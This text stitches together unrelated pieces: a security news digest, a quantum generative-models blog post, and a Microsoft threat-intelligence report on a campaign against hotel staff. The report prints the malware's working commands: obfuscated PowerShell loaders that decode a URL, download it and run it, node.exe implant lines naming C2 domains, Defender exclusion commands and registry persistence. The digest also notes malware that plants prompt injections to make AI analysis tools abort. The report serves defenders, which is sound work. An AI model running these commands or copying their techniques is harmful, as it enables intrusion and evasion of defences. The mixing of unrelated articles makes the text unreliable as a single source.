Cisco Catalyst SD-WAN Zero-Day (CVE-2026-20245) Actively Exploited for Root Access

Attackers are exploiting a critical zero-day vulnerability in Cisco Catalyst SD-WAN, allowing root-level access on affected systems. This marks the 7th such SD-WAN vulnerability exploited in 2026, with evidence of in-the-wild activity months before official patching.

Key Details: The flaw enables high-privilege access, posing risks to organizations relying on Cisco for wide-area networking and communications infrastructure. Cisco has issued patches, but delayed disclosure highlights the dangers of prolonged exposure windows.

Implications and Advice: Organizations should immediately apply patches, audit SD-WAN configurations, and monitor for indicators of compromise (IoCs). This incident underscores the need for rapid vulnerability management in enterprise networking gear.

FortiBleed Campaign: Massive Credential Harvesting Hits ~75,000 FortiGate Firewalls

A large-scale operation dubbed “FortiBleed” has compromised administrative and VPN credentials for tens of thousands of internet-facing Fortinet FortiGate devices worldwide (estimates range 30k–75k across 194 countries). Attackers used credential stuffing from prior leaks, brute-forcing, and config extraction, exposing roughly half of public FortiGate instances.

Key Details: The campaign includes automated pipelines targeting management interfaces and SSL VPN endpoints. Exposed data enables full network access for further attacks like ransomware or espionage.

Implications and Advice: Immediately rotate credentials, disable unnecessary public exposure of management interfaces, enable multi-factor authentication (MFA), and review logs for anomalous logins. This serves as a wake-up call for firewall hygiene in hybrid environments.

Tata Electronics Confirms Cyberattack with Data Leaks Allegedly Tied to Apple and Tesla

Indian electronics giant Tata Electronics (a key supplier for Apple and Tesla components) confirmed a cybersecurity incident affecting parts of its IT systems. Ransomware group WorldLeaks claimed responsibility, leaking over 200,000 files including purported trade secrets and design documents. Operations reportedly remain unaffected.

Key Details: The breach involves significant data volumes (~630GB in some reports) and highlights supply-chain risks in manufacturing and electronics sectors.

Implications and Advice: Third-party and supply-chain vendors remain prime targets. Companies should enforce strict vendor risk assessments, contractual security requirements, and continuous monitoring of partner ecosystems.

New Gaslight macOS Malware Uses Prompt Injection to Evade AI Analysis

Security researchers uncovered “Gaslight,” a Rust-based macOS information stealer and implant that embeds prompt injection payloads. These trick AI-assisted malware analysis tools into aborting or refusing to examine the sample.

Key Details: It disrupts automated and analyst workflows, representing an evolution in malware that counters AI-powered defenses. Linked to broader campaigns involving backdoors and initial access brokers.

Implications and Advice: Security teams should diversify analysis tools (human + multiple AI engines), sandbox samples carefully, and stay updated on adversarial AI techniques. This blurs lines between traditional malware and AI arms races.

Overall Takeaways: Today’s threats blend classic exploitation (zero-days, credential attacks) with emerging AI tactics and supply-chain focus. Prioritize patching, credential hygiene, network segmentation, and AI-resilient defenses. Organizations should treat public-facing infrastructure as high-risk and invest in proactive threat hunting.

Generative models have taken the AI world by storm—turning noise into photorealistic images, coherent text, and even music. Classical powerhouses like Variational Autoencoders (VAEs) and Generative Adversarial Networks (GANs) do the heavy lifting today. But what happens when you throw quantum computing into the mix?

Quantum Machine Learning (QML) promises to supercharge these models by leveraging superposition, entanglement, and quantum parallelism. Quantum versions of VAEs and GANs (QVAEs and QGANs) aren’t just sci-fi anymore; they’re active areas of research with potential exponential advantages in certain tasks. Let’s dive in.

Classical Foundations: VAE and GAN Refresher

Variational Autoencoders (VAEs): These encode input data into a lower-dimensional latent space (often probabilistic, like a Gaussian distribution) and then decode it back. They’re great for generative tasks because you can sample from the latent space to create new data. Training maximizes the Evidence Lower Bound (ELBO) for efficient reconstruction and regularization.

Generative Adversarial Networks (GANs): A two-player game where a generator creates fake samples and a discriminator tries to spot them. They excel at high-fidelity outputs but can suffer from mode collapse and training instability.

Both struggle with high-dimensional, complex distributions and require massive classical compute for training and sampling.

Enter the Quantum Realm: QVAE and QGAN

Quantum Variational Autoencoder (QVAE):
In a QVAE, the latent generative process often uses a Quantum Boltzmann Machine (QBM) or variational quantum circuits. The encoder maps classical data to quantum states, and the decoder leverages quantum sampling. Early work (e.g., from 2018) showed hybrid quantum-classical setups where quantum circuits handle the probabilistic latent space more naturally due to inherent quantum randomness and entanglement.

Advantages:

• Better latent representations: Quantum latent spaces can capture correlations that classical ones miss, thanks to entanglement.

• Efficient sampling: Quantum hardware can sample from complex distributions exponentially faster in some cases.

Quantum Generative Adversarial Networks (QGANs):
Here, the generator is typically a parameterized quantum circuit (variational quantum circuit or ansatz) that prepares a quantum state approximating the target data distribution. The discriminator can be classical (hybrid) or fully quantum. The quantum generator uses superposition to explore many possibilities simultaneously.

Hybrid QGANs (quantum generator + classical discriminator) are common on near-term devices. Full quantum versions are emerging too.

Advantages Over Classical Counterparts

1. Exponential Expressivity: Quantum models can represent probability distributions that are hard or impossible for classical networks with similar resources. Research suggests potential quantum advantage in generative tasks, especially for learning and sampling complex distributions.

2. Data Efficiency: QGANs may learn complex distributions from smaller datasets due to higher representational power—useful for domains like finance, drug discovery, or quantum simulation itself.

3. Natural Probability Handling: Quantum computers are probabilistic by nature. Generating samples from quantum states aligns perfectly with generative modeling goals, potentially outperforming classical Monte Carlo methods.

4. Speedups in Specific Tasks: Google Quantum AI and others have demonstrated generative quantum advantage for certain classical and quantum problems, with efficient training and sampling beyond classical reach in theory.

Real-world glimpses: Applications in finance (generating market scenarios), molecular generation, and anomaly detection.

Challenges: The Quantum Reality Check

It’s not all entanglement and glory:

• Noise and Hardware Limitations: Current NISQ (Noisy Intermediate-Scale Quantum) devices suffer from decoherence, gate errors, and limited qubits. Training can be unstable.

• Trainability Issues: Barren plateaus (flat optimization landscapes) and exponential loss concentration plague quantum generative models, making optimization hard.

• Scalability and Hybrid Overhead: Interfacing quantum and classical parts introduces latency. Full quantum advantage requires fault-tolerant quantum computers, which are years away.

• Evaluation and Metrics: Measuring how “good” a quantum-generated distribution is remains tricky, especially on quantum hardware.

• Resource Requirements: Even hybrid models demand significant classical post-processing.

Opportunities Ahead

Despite hurdles, the field is exploding:

• Hybrid Architectures: Leverage quantum for the hard generative parts and classical for everything else—practical today on simulators or small quantum devices like those from IonQ, IBM, or Xanadu.

• Domain-Specific Wins: Finance (synthetic data), materials science (molecule generation), and AI itself (better priors for classical models).

• Provable Advantages: Recent works show trainable models with quantum advantage in learning/sampling.

• Integration with Classical AI: Quantum-enhanced generative models could boost diffusion models, LLMs, or simulation tasks.

As hardware improves (error correction, more qubits), expect breakthroughs. Tools like PennyLane, Qiskit, and TensorFlow Quantum make experimentation accessible.

Conclusion

Quantum Machine Learning for generative models isn’t replacing classical AI tomorrow—but it offers a tantalizing path to overcome current limitations in expressivity, efficiency, and sampling. QVAEs and QGANs highlight how quantum mechanics’ weirdness could become generative AI’s secret weapon.

The future? A world where quantum computers dream up new realities faster than we can observe them. Stay tuned (and maybe keep your classical GPUs warmed up as backup).

What do you think—ready for quantum hallucinations in your next image gen tool? Drop thoughts in the comments!

Microsoft Threat Intelligence has identified an active multi-stage intrusion campaign targeting organizations in the hospitality and hotel industry since April 2026. We’ve observed this activity through aggregated threat intelligence and security signals across multiple organizations in Europe and Asia. Microsoft has not attributed this campaign to a known threat actor. 

The campaign uses photo-themed ZIP archives that the target users download through the browser. These archives contain fake image shortcut files that, when launched, start an attack chain that relies on obfuscated PowerShell, a Node.js-based implant, dual registry persistence, and command-and-control (C2) communications over non-standard ports. As of this writing, the campaign’s post-compromise activities include C2 beaconing, forced shutdowns, and compilation of portable executable (PE) payloads. While the campaign’s ultimate objective remains unclear, we assess that the threat actor’s investment in ensuring obfuscation and persistence could indicate that they’re preparing the victim devices for more follow-on activities. 

In late May 2026, we observed the threat actor misusing legitimate services—including the cloud-based scheduling platform Calendly’s email notification infrastructure and Google’s URL redirect functionality—to deliver phishing emails with multilingual lures and subject lines (for example, guest complaints and room inquiries) designed to convince hospitality staff to open the embedded malicious link and download the ZIP archive. These phishing emails attempt to bypass conventional authentication checks through a technique we describe as authentication laundering: by routing phishing messages through a trusted service’s sending infrastructure, the threat actor can make malicious messages appear similar to legitimate notifications to email authentication defenses. 

We’ve observed the campaign evolving in two distinct waves. The first wave (hereinafter referred to as Wave 1) used shortcut files named IMG-<random numbers>.png.lnk, while the second one (Wave 2) introduced a naming shift to PHOTO-<random numbers>.png.lnk. Wave 2 also introduced a new attack chain stage in which the PowerShell downloader triggered dynamic .NET DLL compilation through csc.exe, and the actor expanded its domain infrastructure to include .cfd domains hosted behind Cloudflare. 

This blog summarizes the campaign’s Wave 1 and Wave 2 attack chains and provides Microsoft Defender detections and recommendations. It’s intended to share threat intelligence to help organizations better understand, identify, and defend against similar attack techniques. The activity described reflects observed patterns and behaviors and is provided to support defensive security efforts. 

Attack chain overview

The campaign follows a multi-stage attack chain with limited variation in overall behavior, even as the actor changed its PowerShell obfuscation and delivery refinements between waves.  

Initial access and user execution 

The campaign begins with delivery of a browser-downloaded archive with a file name that uses the pattern photo-<random numbers>.zip. In one observed activity, links to these archives were delivered through phishing emails. We assess that this file naming convention was designed to appear ordinary yet relevant to hospitality workflows, which commonly exchange guest photos, reservation-related images, or document snapshots. 

In Wave 1, the archive contained a fake image shortcut named IMG-<random numbers>.png.lnk, which masqueraded as a PNG file while remaining executable content. In Wave 2, the threat actor introduced a naming shift to PHOTO-<random numbers>.png.lnk (uppercase PHOTO prefix). Successful execution depended on a target user opening what appeared to be an image. 

The following table lists representative delivery artifacts observed across impacted environments in both campaign waves. The file sizes of the LNK files consistently fell within 1,989 to 2,079 bytes, suggesting the same builder tool. 

Observed LNK and ZIP naming patterns across both campaigns. 

Observed victim device naming patterns, including reception- and front office-associated systems and hotel-named devices, confirm the threat actor’s focus on staff likely to interact with image or document attachments as part of day-to-day operations. Some of the user account names observed across impacted environments include the following strings, which refer to words in different languages such as English, French, Polish, Czech, and Spanish:  

• reception 

• frontdesk 

• reservations 

• accueil  

• recepcja 

• recepce 

• frontoffice  

Phishing infrastructure: Authentication laundering through legitimate services 

Beginning late May 2026, we observed that this campaign’s initial access mechanism also abuses legitimate web services to bypass email authentication controls and obscure the true destination of phishing links. This observation aligns with the previously published findings by other security researchers. 

The threat actor uses Calendly’s email notification system and Google’s URL redirect functionality to construct a multi-hop delivery chain in which the direct Calendly path passes Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC) checks. 

Lure themes and language targeting 

The sender display name across all observed emails is “Booking Manager (via Calendly),” a social engineering choice that appears designed to exploit hospitality staff’s familiarity with booking and scheduling workflows. 

Across the relayed messages, Microsoft observed the following small set of recurring social-engineering themes delivered in Japanese, Danish, and Dutch:  

• Guest complaints 

• Bedbug (Cimex) infestation reports 

• Verification call notices 

• Room condition inquiries 

• Stay review requests 

These lures are deliberately generic and non-personalized: every subject references an anonymous “guest,” “facility,” or “your accommodation,” and none contains a recipient name, guest name, or organization name. This is consistent with high-volume, list-driven distribution rather than tailored spear-phishing. The threat actor relies on urgency and reputational pressure (complaints, “final warning,” health-authority inspection, possible suspension) to drive target hospitality staff to click. 

Phishing lure themes by language, listed by observed prevalence. 

The threat actor reuses the same themes across all three languages, with Japanese as the most prevalent. Notably, unfilled template placeholders—such as a literal ID token in the Danish variant—appeared in some subjects, indicating automated, templated generation. 

Use of Calendly notification infrastructure as a phishing relay 

The threat actor uses a threat actor-controlled Calendly account associated with the subdomain em1618.calendly.com to relay phishing emails to hospitality targets. Authentication results differ by delivery path. 

Authentication results for emails sent through the direct Calendly path. The checks pass because the messages are sent through authorized Calendly-associated sending infrastructure; this does not validate the intent or safety of the message content. 

This technique, which we describe as authentication laundering in this context, exploits the trust model of email authentication. SPF, DKIM, and DMARC verify that an email was sent from authorized infrastructure for a given domain. When the sending domain is a legitimate service and the threat actor controls the message content, these checks confirm the sender is authorized while saying nothing about the intent of the message. 

Multi-hop redirect chain 

Each phishing email contains a Calendly redirect URL that initiates a multi-hop chain intended to obscure the final destination from users and automated URL analysis. The embedded Calendly link routes victims through a four-hop chain before reaching the payload: 

• Step 1: calendly[.]com/url?q=hxxps://share[.]google/TOKEN → HTTP 302 

• Step 2: share[.]google/TOKEN → HTTP 302 

• Step 3: www.google[.]com/share_google?q=TOKEN → HTTP 301 

• Step 4: photo-*[.]cfd → Phishing landing page (Cloudflare challenge gate) 

Calendly’s Link Safety Service interstitial (url?q=) was used as the first hop and Google’s share[.]google redirect as the second. The final .cfd landing pages were freshly registered (for example, photo-26654[.]cfd was 17 days old at the time of analysis), Cloudflare-fronted, and gated behind a Cloudflare Turnstile (“verify you are human”) challenge that doubles as an anti-analysis and geo-gating mechanism before serving the photo-themed ZIP. 

Microsoft assesses that this redirect architecture serves multiple evasion purposes: 

• Fragmentation of URL reputation: No single URL in the chain is inherently malicious at the time of delivery 

• Abuse of Google’s open redirect: The share.google → NULLwww.google.com/share_google redirect leverages Google infrastructure, adding trusted reputation to the chain 

The threat actor maintains a second delivery variant that bypasses the share.google intermediate step, linking directly from a Calendly redirect URL to the phishing domain (calendly[.]com/url?q=photo-*[.]cfd). Microsoft observed that both variants are active simultaneously, with the same Calendly user UUIDs appearing across both paths. This supports the assessment that a single operator is managing the parallel delivery mechanisms. 

PowerShell-based first stage 

Once the malicious shortcut is opened, the next-stage payload invokes PowerShell and launches an obfuscated BigInt decoder. Across the campaign, the PowerShell stage consistently decodes data and then downloads an additional .ps1 file. Microsoft observed a repeating pattern of BigInt decoder →  Invoke-WebRequest → .ps1. The full obfuscation evolution across seven phases is detailed in the Obfuscation evolution section of this blog. 

The decoded URL points to the campaign’s download domains. In the validated chain, the .ps1 file is retrieved from the photo-*.cfd landing domain 

.NET DLL compilation (Wave 2) 

In Wave 2, we observed a new intermediate stage between the PowerShell download and Node.js deployment. The downloaded .ps1 script triggers dynamic .NET compilation through csc.exe (the C# compiler), which in turn invokes cvtres.exe (the resource-to-object converter). This sequence produces small DLL files with random names.  

Representative observed artifacts: 

csc.exe → cvtres.exe → <random>.dll (3,072 bytes) 

Figure 2. Wave 2 .NET DLL compilation chain. The compiled DLL was created but wasn’t observed being loaded through rundll32 or regsvr32 in available telemetry. This stage might be preparatory or conditional. 

Microsoft assesses that this stage wasn’t present in Wave 1 and represents an expansion in the attack chain. 

Script staging and Node.js implant deployment 

After decoding and retrieval, the downloaded PowerShell script runs from the %TEMP% folder. This staging step appears to be transitional rather than final, enabling subsequent download or launch of the campaign’s Node.js component.  

We observed the next step as execution of node.exe from a user-space path. The Node runtime version observed across both waves is node-v24.13.0-win-x64 (SHA-256: d14ba95cdce1ef7dc9ad3ac74949ca5db38b27378ee30f30a23cf26f9e875a11, 89.9 MB – downloaded from the legitimate nodejs[.]org site).  

Figure 3 shows representative observed command lines: 

"node.exe" C:\Users\[REDACTED]\AppData\Local\Nodejs\E2HPVoYGA77RECeb.js safedocphoto[.]info 
"node.exe" C:\Users\[REDACTED]\AppData\Local\Nodejs\jVXvdhxNfcqHuSf.js recallnine[.]info 
"node.exe" C:\Users\[REDACTED]\AppData\Local\Nodejs\c4yCFRzE.js kentjerk[.]info 
"node.exe" C:\Users\[REDACTED]\AppData\Local\Nodejs\FfXznFDs8.js photodoc-secure[.]info 
"node.exe" C:\Users\[REDACTED]\AppData\Local\Nodejs\f76qtHrP.js kelopins[.]info

Figure 3. Node.js implant execution with random JavaScript filenames and C2 domain arguments. 

The Node.js runtime functions as the interpreter for the implant’s .js payloads. Microsoft assesses that placing the runtime in a user-writable location could help the threat actor avoid dependencies on a system-installed Node.js binary while also supporting repeated payload reuse across different filenames. Hash reuse across distinct filenames confirms reuse of the same binaries, reinforcing the assessment that the threat actor prioritizes operational repeatability. 

The Node.js implant also establishes its own persistence by spawning PowerShell to create a detached, hidden child process: 

powershell.exe -c "$code = \"require('child_process').spawn(process.execPath, 
  ['C:\\Users\\[REDACTED]\\AppData\\Local\\Nodejs\\.js'], 
  {detached: true, stdio: 'ignore', windowsHide: true}).unref()\"; 
  $command = ... 

Figure 4. Node.js persistence mechanism using child_process.spawn with detached and windowsHide flags. 

Defense evasion and payload execution 

Once the Node.js component is established, the campaign modifies Defender settings by using Add-MpPreference -ExclusionProcess for temporary-path executables. We assess that this exclusion step is intended to reduce inspection of follow-on binaries located in AppData\Local\Temp. Figure 5 shows representative observed exclusion commands: 

powershell.exe -c "Add-MpPreference -ExclusionProcess \"C:\Users\[REDACTED]\AppData\Local\Temp\utramdJQjRMJ.exe\"" 
powershell.exe -c "Add-MpPreference -ExclusionProcess \"C:\Users\[REDACTED]\AppData\Local\Temp\YEg9nfBg3QG4.exe\"" 
powershell.exe -c "Add-MpPreference -ExclusionProcess \"C:\Users\[REDACTED]\AppData\Local\Temp\57AVjhcz6vL0c.exe\"" 
powershell.exe -c "Add-MpPreference -ExclusionProcess \"C:\Users\[REDACTED]\AppData\Local\Temp\sDNud94J7WVDN.exe\"" 

Figure 5. Defender process exclusions added for randomly named EXE files seconds before their execution. 

These excluded random EXE files in AppData\Local\Temp are then launched, followed by helper .tmp installers or unpackers that used names matching is-*.tmp and commonly ran with /SL5 or /VERYSILENT. This combination suggests a deployment chain in which the Node.js implant stages additional binaries, then launches installer-like helpers to unpack or execute the next payload. Microsoft assesses that the .tmp convention and silent-install flags are likely chosen to minimize user awareness while also obscuring the actual payload family. 

ProgramData relocation and persistence 

Observed payloads are then copied into C:\ProgramData\<random>\<payload>.exe. Lowercase copies with the same hash appear under different filenames, which is consistent with repackaging or relocation for stability rather than recompilation. Figure 6 shows representative observed ProgramData paths from the campaign: 

C:\ProgramData\FFXjwKn\fehqf5oo.exe 
C:\ProgramData\PEIEZlD\qulcp452eb9.exe 
C:\ProgramData\YXbwfua\e6kz1ruadskkk.exe 
C:\ProgramData\PsrOqKF\vl8daccehg.exe 
C:\ProgramData\riloNEK\s8bpfaee.exe 
C:\ProgramData\JMSVrLU\choffgpa.exe 

Figure 6. ProgramData relocation paths with randomized folder names and lowercase payload filenames. 

The persistence model used in this campaign is especially notable. We observed a dual mechanism in which HKCU\RunOnce pointed to the ProgramData executable while HKCU\Run pointed to the Node.js component. Figure 7 shows a representative registry persistence command: 

cmd /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" 
  /v "zZBPZPuA" /t REG_SZ /d "C:\ProgramData\FFXjwKn\fehqf5oo.exe" /f 

Figure 7. Registry RunOnce persistence pointing to ProgramData payload with randomized value name. 

The RunOnce behavior is particularly unusual because the payload refreshes its own persistence after each execution, effectively creating a RunOnce loop. Microsoft assesses that this design might have been intended to complicate cleanup by repopulating an entry that defenders might otherwise treat as one-time execution. 

Command and control 

In later stages of the campaign, compromised systems beacons to fixed IP infrastructure over non-standard ports including: 

• 8443 

• 8445 

• 8453 

• 5555 

• 56001 

• 56002 

• 56003  

We observed the campaign expanding its C2 infrastructure between waves: 

Wave 1 IPs: 

• 178.16.54[.]27 

• 95.217.97[.]121 

• 193.202.84[.]32 

• 178.16.55[.]179 

The IP address 178.16.54[.]27 remains active on ports 56001/56002 across both waves. 

We also observed numerous unique domains themed around photos, documents, visas, safes, and vaults, spanning top-level domains (TLDs) such as the following: 

• .info 

• .com 

• .pro 

• .xyz 

• .cloud 

• .icu 

• .sbs 

• .click 

• .bond 

• .cfd (Wave 2) 

Wave 2 introduced Cloudflare-hosted .cfd domains following a photo-<random numbers> naming convention: 

• photo-26254[.]cfd 

• photo-26654[.]cfd 

• photo-132454[.]cfd 

• photo-8632454[.]cfd 

The domain sec-safe-dc[.]info was observed active in both waves, further supporting the assessment of a single continuous campaign. 

Obfuscation evolution 

A defining characteristic of this campaign is its steady but disciplined obfuscation evolution. Microsoft observed seven PowerShell obfuscation phases over the course of the campaign, but the underlying logic remained consistent: decode embedded data through arithmetic operations, recover the next-stage content, and retrieve a PowerShell script that runs from the %TEMP% folder. This pattern suggests that the threat actor is iterating for durability against static detections rather than experimenting with entirely new tradecraft. 

Phase 1: XOR bigint decoding

Early samples rely on XOR arithmetic, using two large integers and a -bxor operation, followed by byte masking and shifting. The following is a representative observed command line: 

powershell.exe -ep bypass -c "$k=[bigint]\"2004985473718821432817707887657617\"; 
$w=[bigint]\"278573358569528286847653191217377\";$o=$k -bxor $w; 
while($o -ne 0){$g+=[char]([int]($o -band 0xFF));$o=$o -shr 8}; 
iwr $g -OutFile $env:TEMP\eRJGv.ps1 -UseBasicParsing; 
powershell -ep bypass -File $env:TEMP\eRJGv.ps1" 

Figure 9. Phase 1 PowerShell downloader using XOR-based bigint decoding with -bxor, -band 0xFF, and -shr 8. 

Phase 2: Subtraction replaces XOR

Microsoft then observed the threat actor swapping XOR logic for subtraction while keeping the rest of the decoder identical. This change bypasses detections anchored on -bxor: 

powershell.exe -ep bypass -c "$i=[bigint]\"1568015162836542885394310232785365293\"; 
$y=[bigint]\"989592658109712364469795296253690811\";$r=$i - $y; 
while($r -ne 0){$m+=[char]([int]($r -band 0xFF));$r=$r -shr 8}; 
iwr $m -OutFile $env:TEMP\VJksAkfp.ps1 -UseBasicParsing; 
powershell -ep bypass -File $env:TEMP\VJksAkfp.ps1"

Figure 10. Phase 2 variant replacing -bxor with subtraction while preserving the same decoding structure. 

Phase 3: Hexadecimal to decimal substitution

The decoder then shifts from -band 0xFF to -band 255. Although functionally equivalent (0xFF = 255), this change is consistent with a threat actor testing whether surface-level constant changes could degrade signature reliability: 

powershell.exe -ep bypass -c "$e=[bigint]\"1080978693158786688289132234139422058835788841232\"; 
$l=[bigint]\"444996423444240363171355535687083720697400778653\";$w=$e - $l; 
while($w -ne 0){$j+=[char]([int]($w -band 255));$w=$w -shr 8}; 
iwr $j -OutFile $env:TEMP\ymqMj.ps1 -UseBasicParsing; 
powershell -ep bypass -File $env:TEMP\ymqMj.ps1" 

Figure 11. Phase 3 variant replacing 0xFF with decimal 255. 

Phase 4: Arithmetic masking

Masking expressions are further transformed into arithmetic forms that evaluate to the same constant. This variation prevents simple string matching on either 0xFF or 255: 

powershell.exe -ep bypass -c "$e=[bigint]\"988466760738254167909712279829942477\"; 
$y=[bigint]\"352542850680807474382013127968401501\";$i=$e - $y; 
while($i -ne 0){$b+=[char]([int]($i -band (177+78)));$i=$i -shr 8}; 
iwr $b -OutFile $env:TEMP\23QbL.ps1 -UseBasicParsing; 
powershell -ep bypass -File $env:TEMP\23QbL.ps1"

Figure 12. Phase 4 variant hiding the byte mask behind arithmetic expressions such as (177+78). 

Other observed arithmetic masks included -band (100+155) and -band 128+127, all resolving to 255. 

Phase 5: Modulo and division

Later samples replace the bit-shift model entirely, switching from -band and -shr to modulo and division operations: 

powershell.exe -ep bypass -c "$s=[bigint]\"28248557062916408148263140002288993200489702\"; 
$o=[bigint]\"18544237761852163685406436002210545666450291\";$e=$s - $o; 
while($e -ne 0){$x+=[char]([int]($e -band (255)));$e=$e -shr 8}; 
iwr $x -OutFile $env:TEMP\PVtvOP40.ps1 -UseBasicParsing; 
powershell -ep bypass -File $env:TEMP\PVtvOP40.ps1"

Figure 13. Phase 5 transitional variant; later samples in this phase fully replaced -band/-shr with % 256 and / 256. 

Phase 6: Syntax diversification and randomization

The threat actor adopts “num” -as [bigint] casting syntax, introduces long random variable names, and uses modulo/division for byte extraction. The combined effect makes each sample visually distinct despite identical logic: 

powershell.exe -ep bypass -c "$zGjEc0LINYdefj=\"25908558764390958596189327204542\" -as [bigint]; 
$MyL4evU3=256; 
$GqA4xFav=\"17082531775760189576112827972435\" -as [bigint]; 
$XwcU0kg87CFgqe5=$zGjEc0LINYdefj - $GqA4xFav; 
while($XwcU0kg87CFgqe5 -ne 0){ 
  $qy8gWy4FONBaCV+=[char]([int]($XwcU0kg87CFgqe5 % $MyL4evU3)); 
  $XwcU0kg87CFgqe5=$XwcU0kg87CFgqe5 / $MyL4evU3}; 
iwr $qy8gWy4FONBaCV -OutFile $env:TEMP\.ps1 -UseBasicParsing; 
powershell -ep bypass -File $env:TEMP\.ps1"

Figure 14. Phase 6 variant using -as [bigint] syntax, long randomized variable names, and modulo/division decoding. 

Phase 7: For-loop variant with arithmetic mask (Wave 2)

The most recent observed phase introduces a for-loop iteration model with an arithmetic mask using a variable set to 100+156 (=256) and -as [bigint] casting. This is a natural evolution of Phase 6’s syntax diversification, further altering the control flow structure while preserving the same underlying decode-and-download behavior: 

powershell.exe -ep bypass -c "$IcZWdT=100+156; 
$=\"\" -as [bigint]; 
$=\"\" -as [bigint]; 
$=$ - $; 
for($i=0; $ -ne 0; $i++){ 
  $
+=[char]([int]($ % $IcZWdT)); 
  $=[bigint]($ / $IcZWdT)}; 
iwr $
 -OutFile $env:TEMP\.ps1 -UseBasicParsing; 
powershell -ep bypass -File $env:TEMP\.ps1"

Figure 15. Phase 7 variant (Wave 2) introducing a for-loop with arithmetic mask $IcZWdT=100+156 and -as [bigint] casting. 

This seven-phase evolution demonstrates a threat actor that monitors or anticipates detection pressure. The campaign doesn’t pivot away from PowerShell or Node.js; instead, it repeatedly re-skins a working loader. For defenders, this means purely literal detections on isolated operators, constants, or variable names might age quickly, while behavior-based detections anchored on the full sequence—shortcut execution, PowerShell decode, %TEMP% staging, Node.js from user space, Defender exclusions, and ProgramData persistence—are likely to remain more resilient. 

Campaign evolution 

Microsoft assesses that the observable differences between Wave 1 and Wave 2 represent a deliberate operational evolution by the same threat actor. The following cross-wave correlations support this assessment: 

Evidence of a single continuous campaign 

Cross-wave artifact overlaps demonstrating a single continuous campaign. 

What changed between waves 

Summary of campaign evolution from Wave 1 to Wave 2. 

Microsoft assesses that these changes reflect operational maturation rather than a shift in objectives. The threat actor expanded evasion (DLL compilation, Cloudflare fronting) and broadened targeting—all while maintaining the same core attack chain and reusing key infrastructure. 

Persistence survival analysis 

One of the significant findings from Wave 2 is the demonstrated resilience of the dual persistence model under active Defender intervention. 

On a confirmed compromised device, Defender detected and blocked one PE payload (xmnrwv9l.exe, SHA-256: 04ec44f2618460f5c77c5e56014a512cc03a123c9c5b6b6b1273e2a1681ac2e1) with Wacatac detections. Despite that block, the Node.js HKCU\Run key persistence remained active. Approximately two days later, the Node.js implant reactivated and resumed C2 communications to new domains. 

Following the initial block, Microsoft observed additional /VERYSILENT EXEs deployed on the same device: 

cBA8H4S5k04jAY.exe 
eaa3q8BQZcnIOV.exe 
BaUWXagH4CGZS.exe 
CJE4domtVFM9LX.exe

Figure 18. Additional payload EXEs deployed after Defender blocked the initial PE, demonstrating the implant’s ability to retry delivery through the surviving Node.js persistence. 

This sequence highlights a remediation consideration: the dual persistence model (RunOnce for the PE payload + Run for Node.js) means that blocking one execution path might not fully neutralize the other. The Node.js implant, if it remains active, can re-download and re-attempt payload delivery. Microsoft assesses that complete remediation of this campaign requires removal of both persistence mechanisms—the ProgramData RunOnce entry and the Node.js Run key—along with the Node.js runtime and associated .js files from the user’s AppData\Local\Nodejs\ directory. 

Post-compromise activity 

Microsoft observed a subset of devices reaching clear late-stage post-compromise behavior. On multiple devices, the activity progressed to active C2 beaconing, browser automation with –headless –no-sandbox flags, and environment lookups. Based on the command-line pattern alone, Microsoft assesses that the threat actor likely used automated browser execution rather than manual interactive browsing on those hosts. 

The campaign also performed an environment lookup using ip-api[.]com, observed through 208.95.112[.]1. This behavior is consistent with gathering external network context before continuing operations. Microsoft assesses that this lookup might have helped the operator understand geographic or connectivity attributes of the compromised device environment. 

A final disruptive behavior involved forced shutdown through cmd /c shutdown -s -t 0, observed on multiple devices. Microsoft assesses that immediate shutdown could have served several purposes depending on the host context: interruption of user activity, reduction of defender response time during a specific stage, or concealment of visible symptoms after automated browser tasks or payload launches completed. 

The persistence design itself is a meaningful post-compromise observation. The combination of a durable Node.js launch point in HKCU\Run and a repeatedly refreshed ProgramData payload through HKCU\RunOnce suggests an effort to maintain execution options across user sign-ins while also preserving a secondary recovery path. This RunOnce loop is unusual enough that it might provide defenders with a strong hunting pivot even when file names, domains, or script syntax change. 

Mitigation and protection guidance

Organizations in hospitality and adjacent service industries should prioritize layered detections for this campaign’s behavior sequence rather than any single indicator. Microsoft recommends the following actions based on the observed attack chain: 

1. Treat photo-themed ZIP archives and fake image shortcuts as high risk. Investigate browser-downloaded archives matching photo-<random numbers>.zip and shortcut files matching IMG-<random numbers>.png.lnk or PHOTO-<random numbers>.png.lnk, especially when they’re followed by PowerShell or script interpreter launches. Learn more about attack surface reduction rules 

2. Harden and monitor PowerShell execution. Because the campaign repeatedly used obfuscated BigInt arithmetic across seven phases, defenders should prioritize PowerShell activity that includes unusual combinations of BigInt casting, subtraction or XOR decode logic, byte masking, modulo or division byte extraction, for-loop decode patterns, and subsequent Invoke-WebRequest behavior. Learn more about PowerShell constrained language 

3. Monitor for unexpected .NET compilation. The appearance of csc.exe spawning cvtres.exe and producing small DLLs in user-writable paths, especially when initiated by PowerShell scripts from %TEMP%, is unusual in hospitality environments and should be investigated. 

4. Investigate Node.js execution from user-space paths. node.exe running from C:\Users\<user>\AppData\Local\Nodejs\ with a random .js file and domain argument is unusual in many enterprise environments. Microsoft recommends reviewing whether Node.js is expected on reception, front office, or similarly targeted systems. 

5. Alert on Defender exclusion changes tied to temporary executables. Add-MpPreference -ExclusionProcess aligned to %TEMP% or AppData\Local\Temp should be treated as suspicious when associated with shortcut-driven or script-driven execution chains. Learn more about tamper protection .

6. Hunt for random EXE launches from temporary paths and helper .tmp installers. The campaign uses numerous unique temporary executable filenames and helper is-*.tmp files with /SL5 or /VERYSILENT. These patterns are likely more durable than individual filenames. 

7. Review persistence in both HKCU\Run and HKCU\RunOnce. Pay particular attention to values that launch node.exe from user directories or reference executables under C:\ProgramData\<random>\. Because the campaign refreshes RunOnce, repeated recreation of that value might be a strong signal. Critically, both keys must be removed during remediation—removing only the RunOnce entry leaves the Node.js implant active. 

8. Monitor network connections on the observed non-standard ports. Outbound traffic to 8443, 8445, 8453, 5555, 56001, 56002, and 56003, especially when initiated by node.exe or executables from user profile and temporary paths, should be reviewed promptly. 

9. Block or alert on .cfd domains matching the campaign pattern. Wave 2 domains follow a photo-<digits>[.]cfd naming convention. Organizations should consider blocking these patterns and monitoring for DNS queries to recently registered .cfd domains. 

